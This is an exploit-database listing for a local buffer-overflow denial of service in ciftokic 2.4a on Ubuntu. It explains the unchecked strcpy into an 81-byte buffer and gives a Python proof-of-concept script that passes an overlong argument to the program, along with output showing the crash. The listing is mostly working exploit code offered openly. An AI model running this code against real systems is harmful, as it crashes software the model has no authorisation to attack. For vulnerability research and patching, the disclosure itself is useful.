kic 2.4a Denial Of Service

2019.10.02
Credit: JosueEncinar
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Ciftokic 2.4a - DoS Buffer Overflow # Date: September 30, 2019 # Exploit Author: @JosueEncinar # Software Link: http://launchpad.net/ubuntu/+source/kic/2.4a-1 # Version: 2.4a # Tested on: Ubuntu 18.04 ''' If we check the ciftokic.c file on line 52 we see the following code: char CIFFile[81], *Tmp;. In line 84 we have the problem with the following instruction: strcpy(CIFFile,argv[1]); If the first argument is 80 characters or less, nothing happens, but if we put from 81 onwards the program fails with a Buffer Overflow. ''' # To test the code use Python 3.6+ from os import system from sys import argv def print_usage(): print("Usage: python3 ciftokic_overflow.py <characters_numbers>") print(" |_No Buffer Overflow: python3 ciftokic_overflow.py 80") print(" |_Buffer Overflow: python3 ciftokic_overflow.py 81") if len(argv) == 1: print_usage() else: try: number = int(argv[1]) payload = "J"*number system(f"ciftokic {payload}") except: print_usage() """ Output Example: josue@josue:~/Escritorio$ python3 ciftokic_overflow.py 80 Error: can't read CIF input file JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ josue@josue:~/Escritorio$ python3 ciftokic_overflow.py 81 *** buffer overflow detected ***: ciftokic terminated Aborted (core dumped) """


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top